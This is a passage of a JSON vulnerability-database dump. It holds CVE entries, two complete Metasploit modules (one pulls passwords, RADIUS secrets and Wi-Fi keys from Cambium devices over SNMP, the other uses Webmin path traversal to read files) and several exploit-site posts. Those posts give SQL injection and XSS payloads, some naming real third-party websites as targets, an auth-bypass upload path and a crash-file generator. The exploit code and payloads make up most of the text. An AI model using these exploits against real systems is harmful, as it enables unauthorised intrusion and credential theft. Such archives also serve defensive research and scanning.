"https://threats.kaspersky.com/en/vulnerability/KLA11316", "title": "\r KLA11316Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-10-16T17:30:09", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative 
execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.", "modified": "2019-05-23T15:29:00", "id": "CVE-2018-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3639", "published": "2018-05-22T12:29:00", "title": "CVE-2018-3639", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-10T12:22:17", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.", "modified": "2019-04-23T19:30:00", "id": "CVE-2017-5753", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5753", "published": "2018-01-04T13:29:00", "title": "CVE-2017-5753", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-02T08:17:25", "bulletinFamily": "exploit", "description": "Cambium devices (ePMP, PMP, Force, & others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. 
The module has been tested on Cambium ePMP versions 3.5 & prior.\n", "modified": "2019-08-15T23:10:44", "published": "2017-12-18T22:32:55", "id": "MSF:AUXILIARY/SCANNER/SNMP/EPMP1000_SNMP_LOOT", "href": "", "type": "metasploit", "title": "Cambium ePMP 1000 SNMP Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Cambium ePMP 1000 SNMP Enumeration',\n 'Description' => %{\n Cambium devices (ePMP, PMP, Force, & others) can be administered using\n SNMP. The device configuration contains IP addresses, keys, and passwords,\n amongst other information. This module uses SNMP to extract Cambium ePMP device\n configuration. On certain software versions, specific device configuration\n values can be accessed using SNMP RO string, even though only SNMP RW string\n should be able to access them, according to MIB documentation. The module also\n triggers full configuration backup, and retrieves the backup url. The\n configuration file can then be downloaded without authentication. 
The module\n has been tested on Cambium ePMP versions 3.5 & prior.\n },\n 'References' =>\n [\n ['URL', 'https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/'],\n ['CVE', '2017-7918'],\n ['CVE', '2017-7922']\n ],\n 'Author' => ['Karn Ganeshen'],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n begin\n snmp = connect_snmp\n\n epmp_info = ''\n\n # System Info\n snmp_systemname = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.3.0')\n snmp_systemdescription = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.4.0')\n system_uptime = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.4.0')\n uboot_version = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.14.0')\n\n epmp_info << \"SNMP System Name: #{snmp_systemname}\" << \"\\n\"\n epmp_info << \"SNMP System Description: #{snmp_systemdescription}\" << \"\\n\"\n epmp_info << \"Device UpTime: #{system_uptime}\" << \"\\n\"\n epmp_info << \"U-boot version: #{uboot_version}\" << \"\\n\"\n\n # SNMP Info\n snmp_readonly_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.1.0')\n snmp_readwrite_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.2.0')\n snmp_trap_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.6.0')\n snmp_trap_entryip = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.7.1.2.0')\n\n epmp_info << \"SNMP read-only community name: #{snmp_readonly_community}\" << \"\\n\"\n epmp_info << \"SNMP read-write community name: #{snmp_readwrite_community}\" << \"\\n\"\n epmp_info << \"SNMP Trap Community: #{snmp_trap_community}\" << \"\\n\"\n epmp_info << \"SNMP Trap Server IP Address: #{snmp_trap_entryip}\" << \"\\n\"\n\n # WIFI Radius Info\n wireless_radius_serverinfo = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.5.0')\n wireless_radius_serverport = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.3.0')\n wireless_radius_serversecret = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.4.0')\n wireless_radius_username = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.8.0')\n wireless_radius_password = 
snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.9.0')\n\n epmp_info << \"RADIUS server info: #{wireless_radius_serverinfo}\" << \"\\n\"\n epmp_info << \"RADIUS server port: #{wireless_radius_serverport}\" << \"\\n\"\n epmp_info << \"RADIUS server secret: #{wireless_radius_serversecret}\" << \"\\n\"\n epmp_info << \"Wireless Radius Username: #{wireless_radius_username}\" << \"\\n\"\n epmp_info << \"Wireless Radius Password: #{wireless_radius_password}\" << \"\\n\"\n\n # WIFI Info\n wireless_interface_ssid = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.2.0')\n wireless_interface_encryptionkey = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.4.0')\n wireless_interface_encryption = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.3.0')\n\n epmp_info << \"Wireless Interface SSID: #{wireless_interface_ssid}\" << \"\\n\"\n epmp_info << \"Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}\" << \"\\n\"\n epmp_info << \"Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption}\" << \"\\n\"\n\n # Network PPPoE config\n network_wan_pppoeservice = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.13.0')\n network_wan_pppoeusername = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.10.0')\n network_wan_pppoepassword = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.11.0')\n\n epmp_info << \"Network PPPoE Service Name: #{network_wan_pppoeservice}\" << \"\\n\"\n epmp_info << \"Network PPPoE Username: #{network_wan_pppoeusername}\" << \"\\n\"\n epmp_info << \"Network PPPoE Password: #{network_wan_pppoepassword}\" << \"\\n\"\n\n # Printing captured info\n print_status(\"Fetching System Information...\\n\")\n print_good(\"#{ip}\")\n print_good(\"SNMP System Name: #{snmp_systemname}\")\n print_good(\"SNMP System Description: #{snmp_systemdescription}\")\n print_good(\"Device UpTime: #{system_uptime}\")\n print_good(\"U-boot version: #{uboot_version} \\n\")\n\n print_status(\"Fetching SNMP Information...\\n\")\n print_good(\"SNMP read-only community 
name: #{snmp_readonly_community}\")\n print_good(\"SNMP read-write community name: #{snmp_readwrite_community}\")\n print_good(\"SNMP Trap Community: #{snmp_trap_community}\")\n print_good(\"SNMP Trap Server IP Address: #{snmp_trap_entryip} \\n\")\n\n print_status(\"Fetching WIFI Information...\\n\")\n print_good(\"Wireless Interface SSID: #{wireless_interface_ssid}\")\n print_good(\"Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}\")\n print_good(\"Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption} \\n\")\n\n print_status(\"Fetching WIFI Radius Information...\\n\")\n print_good(\"RADIUS server info: #{wireless_radius_serverinfo}\")\n print_good(\"RADIUS server port: #{wireless_radius_serverport}\")\n print_good(\"RADIUS server secret: #{wireless_radius_serversecret}\")\n print_good(\"Wireless Radius Username: #{wireless_radius_username}\")\n print_good(\"Wireless Radius Password: #{wireless_radius_password} \\n\")\n\n print_status(\"Fetching Network PPPoE Information...\\n\")\n print_good(\"Network PPPoE Service Name: #{network_wan_pppoeservice}\")\n print_good(\"Network PPPoE Username: #{network_wan_pppoeusername}\")\n print_good(\"Network PPPoE Password: #{network_wan_pppoepassword} \\n\")\n\n # set request\n backup_oid = '1.3.6.1.4.1.17713.21.6.4.10.0'\n enable_backup = '1'\n varbind = SNMP::VarBind.new(backup_oid, SNMP::OctetString.new(enable_backup))\n snmp.set(varbind)\n backup_location_oid = '1.3.6.1.4.1.17713.21.6.4.13.0'\n backup_location = snmp.get_value(backup_location_oid)\n\n if @backup_location.present? == false\n print_status('Backup needs to triggered manually. 
Run the following commands:')\n print_status(\" snmpset -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.10.0 i 1\")\n print_status(\" snmpget -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.13.0 \\n\")\n else\n print_good(\"Configuration backed-up for direct download at: #{backup_location}\")\n end\n\n # Woot we got loot.\n loot_name = 'snmp_loot'\n loot_type = 'text/plain'\n loot_filename = 'epmp1000_snmp_loot.txt'\n loot_desc = 'Cambium ePMP configuration data'\n p = store_loot(loot_name, loot_type, datastore['RHOST'], epmp_info, loot_filename, loot_desc)\n print_good(\"Cambium ePMP loot saved at #{p}\")\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip} SNMP request timeout.\")\n rescue Rex::ConnectionError\n print_error(\"#{ip} Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue SNMP::UnsupportedVersion\n print_error(\"#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n elog(\"Unknown error: #{e.class} #{e}\")\n elog(\"Call stack:\\n#{e.backtrace.join \"\\n\"}\")\n ensure\n disconnect_snmp\n end\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb"}, {"lastseen": "2019-12-01T17:54:46", "bulletinFamily": "exploit", "description": "A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. 
The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).\n", "modified": "2017-07-24T13:26:21", "published": "2008-01-06T22:02:01", "id": "MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Webmin File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Webmin File Disclosure',\n 'Description' => %q{\n A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '26772'],\n ['BID', '18744'],\n ['CVE', '2006-3392'],\n ['US-CERT-VU', '999601'],\n ['URL', 'http://secunia.com/advisories/20892/'],\n ],\n 'DisclosureDate' => 'Jun 30 2006',\n 'Actions' =>\n [\n ['Download']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n Opt::RPORT(10000),\n OptString.new('RPATH',\n [\n true,\n \"The file to download\",\n \"/etc/passwd\"\n ]\n ),\n OptString.new('DIR',\n [\n true,\n \"Webmin directory path\",\n \"/unauthenticated\"\n ]\n ),\n ])\n end\n\n def run\n print_status(\"Attempting to retrieve #{datastore['RPATH']}...\")\n\n dir = normalize_uri(datastore['DIR'])\n uri = Rex::Text.uri_encode(dir) + \"/..%01\" * 40 + 
Rex::Text.uri_encode(datastore['RPATH'])\n\n res = send_request_raw({\n 'uri' => uri,\n }, 10)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print(res.body)\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/webmin/file_disclosure.rb"}], "zdt": [{"lastseen": "2018-03-03T01:42:01", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-07-20T00:00:00", "published": "2017-07-20T00:00:00", "href": "https://0day.today/exploit/description/28160", "id": "1337DAY-ID-28160", "title": "Joomla JoomRecipe 1.0.4 Component - search_author Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability\r\n# Date: 20.07.2017\r\n# Exploit Author: Teng\r\n# Vendor Homepage: http://joomboost.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/\r\n# Version: 1.0.4\r\n# Platform: PHP\r\n \r\n1. Description\r\nBlind SQL Injection on Search page, with \"search_author\" parameter (POST)\r\n \r\n2. 
Proof of concept\r\nsqlmap.py -u \"http://localhost/[PATH]/search/results.html\" -p search_author --data \"searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999&currentIngredient=\" --random-agent --dbs\r\n \r\nParameter: search_author (POST)\r\n Type: boolean-based blind\r\n Title: MySQL >= 5.0 boolean-based blind - Parameter replace\r\n Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999&currentIngredient=\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28160"}, {"lastseen": "2018-01-05T11:10:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-03-01T00:00:00", "published": "2017-03-01T00:00:00", "href": "https://0day.today/exploit/description/27160", "id": "1337DAY-ID-27160", "type": "zdt", "title": "WordPress User Login Log 2.2.1 Plugin - Cross-Site Scripting Vulnerability", "sourceData": "Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html\r\n \r\nAbstract\r\nA stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. 
This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0011\r\n \r\nTested versions\r\nThis issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.\r\n \r\nFix\r\nThere is currently no fix available.\r\n \r\nIntroduction\r\nThe User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\nThis vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. 
This issue exists in method column_default() that is implemented in the file user-login-log.php.\r\n \r\nfunction column_default($item, $column_name)\r\n{\r\n \r\n[...]\r\n \r\n switch($column_name){\r\n \r\n[...]\r\n \r\n default:\r\n return $item[$column_name];\r\n }\r\n}\r\nProof of concept:\r\n \r\nPOST /wp-login.php HTTP/1.1\r\nHost: <target>\r\nUser-Agent: XSS<script>document.getElementById(/wpwrap/.toString().substring(1, 7)).innerHTML = String.fromCharCode([...]);document.getElementById(/wpwrap/.toString().substring(1, 7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode([...]) + 60 * 
10;\r\n</script>XSS\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nAccept-Encoding: gzip,deflate,lzma,sdch\r\nCookie: wordpress_test_cookie=WP+Cookie+check\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n \r\nlog=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27160", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-02T21:08:55", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "1337DAY-ID-17648", "href": "https://0day.today/exploit/description/17648", "type": "zdt", "title": "SRISMS - XSS / SQL Injection Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 
1\r\n1 1\r\n0 [+] Official Website: http://www.1337day.com 0\r\n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm NuxbieCyber Member From Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[ SRISMS - SQL Injection Vulnerability ]\r\n\r\n[x] Author : the_cyber_nuxbie\r\n[x] Home : www.thecybernuxbie.com\r\n[x] E-mail : [email\u00a0protected]\r\n[x] Found : 10 March 2012 @ 08:25 PM.\r\n[x] Tested : Back|Track 5.\r\n[x] Dork : inurl:\"/searchviewdetails.php?id=\"\r\n________________________________________________________________________\r\n************************************************************************\r\n\r\n- Info WebApps:\r\nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html\r\n\r\n- Exploit Report:\r\nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection]\r\n\r\n- Sample WebApps Vuln SQLi:\r\nhttp://gayatrivivahakendram.com/searchviewdetails.php?id=730' + [SQL Injection]\r\nhttp://agtsangham.com/searchviewdetails.php?id=400' + [SQL Injection]\r\nhttp://kapumarriagelinks.com/searchviewdetails.php?id=280' + [SQL Injection]\r\nhttp://visakhamarriagelines.com/searchviewdetails.php?id=8160' + [SQL Injection]\r\nhttp://kyathimarriages.com/searchviewdetails.php?id=780' + [SQL Injection]\r\nhttp://ssmarriagelinks.com/searchviewdetails.php?id=358' + [SQL Injection]\r\nhttp://srisimhadrimarriagelinks.com/searchviewdetails.php?id=568' + [SQL Injection]\r\n\r\n - Google Dork:\r\n inurl:\"/searchviewdetails.php?id=\"\r\n\r\n - Exploit Concept:\r\n http://lokalisasi/searchviewdetails.php?id=[XSS]\r\n\r\n - Sample Web Persistent XSS Vulnerability:\r\n http://gayatrivivahakendram.com/searchviewdetails.php?id=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS]\r\n http://kapumarriagelinks.com/searchviewdetails.php?id=<marquee><font color=red size=15>XSSed By 
Nuxbie</font></marquee> <:- [XSS]\r\n http://visakhamarriagelines.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n http://kyathimarriages.com/searchviewdetails.php?id=<script>alert(31337);</script> <:- [XSS]\r\n\r\n \r\n0day no more...\r\n\"n0 d0rk f0r k1dd10ts\"\r\n\r\n- Curahan Hati:\r\nI want to school college level...\r\n(the biggest obsession = S1 - TI)\r\nBut I do not have a cost...\r\nHelp Me...!!!\r\n\r\n- Greetz:\r\n*** 1337day Inject0r TEAM ***\r\n...:::' All Member & Staff Inject0r TEAM ':::...\r\n\r\n- Greetz To All Exploiters From Indonesian:\r\n[ Member Of Inj3ct0r & Exploit-DB ]\r\nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,\r\neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,\r\nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, NoGe, \r\nNTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,\r\nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... 
\r\n\r\n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\"\r\n\r\nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian.\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17648"}, {"lastseen": "2018-01-08T17:08:56", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11521", "href": "https://0day.today/exploit/description/11521", "type": "zdt", "title": "Fa Home (Auth Bypass) Vulnerability", "sourceData": "===================================\r\nFa Home (Auth Bypass) Vulnerability\r\n===================================\r\n\r\n======================================================================================== \r\n| # Title : Fa Home (Auth Bypass) Vulnerability \r\n| # Author : indoushka \r\n| # email : [email\u00a0protected] \r\n| # Home : www.iqs3cur1ty.com \r\n| # Web Site :\r\n| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) \r\n| # Bug : (Auth Bypass) \r\n====================== Exploit By indoushka =================================\r\n # Exploit :\r\n \r\n 1 - http://localhost/FaHome//admin/ (Admin Panel)\r\n \r\n 2 - http://localhost/FaHome//admin/edit.index.php (Edit index Home)\r\n \r\n 3 - http://localhost/FaHome//admin/image.php (2 Upload Ev!l)\r\n \r\n 4 - http://localhost/FaHome/upload/1.php (2 Find Ev!l)\r\n\r\n\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11521"}, {"lastseen": "2018-04-08T03:44:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2010-03-18T00:00:00", "published": "2010-03-18T00:00:00", "id": "1337DAY-ID-11353", "href": "https://0day.today/exploit/description/11353", "type": "zdt", "title": "mplayer <= 4.4.1 NULL pointer dereference exploit 
poc", "sourceData": "=====================================================\r\nmplayer <= 4.4.1 NULL pointer dereference exploit poc\r\n=====================================================\r\n\r\n# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day\r\n# Date: 17/03/2010\r\n# Author: Pietro Oliva\r\n# Software Link:\r\n# Version: <= 4.4.1\r\n# Tested on: ubuntu 9.10 but should work in windows too\r\n# CVE : \r\n \r\n#Program received signal SIGSEGV, Segmentation fault.\r\n#0x081176d8 in af_calc_filter_multiplier ()\r\n#(gdb) disas af_calc_filter_multiplier\r\n#Dump of assembler code for function af_calc_filter_multiplier:\r\n#0x081176d0 <af_calc_filter_multiplier+0>: push %ebp\r\n#0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp\r\n#0x081176d3 <af_calc_filter_multiplier+3>: fld1 \r\n#0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax\r\n#0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! 
\r\n#0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi\r\n#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)\r\n#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax\r\n#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax\r\n#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>\r\n#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp\r\n#0x081176eb <af_calc_filter_multiplier+27>: ret \r\n#End of assembler dump.\r\n \r\n# REGISTERS:\r\n#eax 0x0 0 ==========> NULL\r\n#ecx 0xfa157a57 -99255721\r\n#edx 0x1fe0 8160\r\n#ebx 0x8509a08 139500040\r\n#esp 0xbfffe2e8 0xbfffe2e8\r\n#ebp 0xbfffe2e8 0xbfffe2e8\r\n#esi 0x7b84000 129515520\r\n#edi 0xf8000 1015808\r\n#eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8>\r\n#eflags 0x10216 [ PF AF IF RF ]\r\n#cs 0x73 115\r\n#ss 0x7b 123\r\n#ds 0x7b 123\r\n#es 0x7b 123\r\n#fs 0x0 0\r\n#gs 0x33 51\r\n \r\n \r\n \r\n#!/usr/bin/perl\r\n \r\nprint \"[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\\n\";\r\nprint \"[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\\n\";\r\nprint \"[+] creating crafted file mplayer.wav\\n\";\r\n$buffer=\"\\x52\\x49\\x46\\x46\\x1f\\x04\\x00\\x00\\x57\\x41\\x56\\x45\\x66\\x6d\\x74\\x20\\x10\\x00\\x00\\x00\\x01\\x00\\x1f\";\r\nopen(file,\"> mplayer.wav\");\r\nprint(file $buffer);\r\nprint \"[+] done!\\n\";\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11353"}, {"lastseen": "2018-02-09T05:16:06", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-08-31T00:00:00", "published": "2008-08-31T00:00:00", "id": "1337DAY-ID-3577", "href": "https://0day.today/exploit/description/3577", "type": "zdt", "title": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability", "sourceData": 
"==============================================================\r\nWords tag script 1.2 (word) Remote SQL Injection Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n|___________________________________________________|\r\n|\r\n| Words tag script v1.2 (word) Remote SQL Injection Vulnerability\r\n|\r\n|___________________________________________________\r\n|---------------------Hussin X----------------------|\r\n|\r\n| Author: Hussin X\r\n|\r\n|___________________________________________________\r\n| |\r\n|\r\n| DorK : \"Powered by words tag script\"\r\n|___________________________________________________|\r\n\r\nExploit: \r\n________\r\n\r\n\r\nwww.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n\r\nL!VE DEMO:\r\n_________\r\n\r\n\r\nhttp://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--\r\n\r\n\r\n________________________\r\n\r\ntable_name : column_name\r\n\r\nconfig_variables:variable_name\r\nconfig_variables:value\r\nconfig_variables:id\r\nconfig_variables:title\r\nconfig_variables:text\r\nconfig_variables:description\r\n_______________________\r\n\r\n\r\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3577"}], "openvas": [{"lastseen": "2019-10-24T21:17:19", "bulletinFamily": "scanner", "description": "QuickHeal is prone to a denial-of-service vulnerability.", "modified": "2019-10-23T00:00:00", "published": "2017-05-02T00:00:00", "id": "OPENVAS:1361412562310107160", "href": 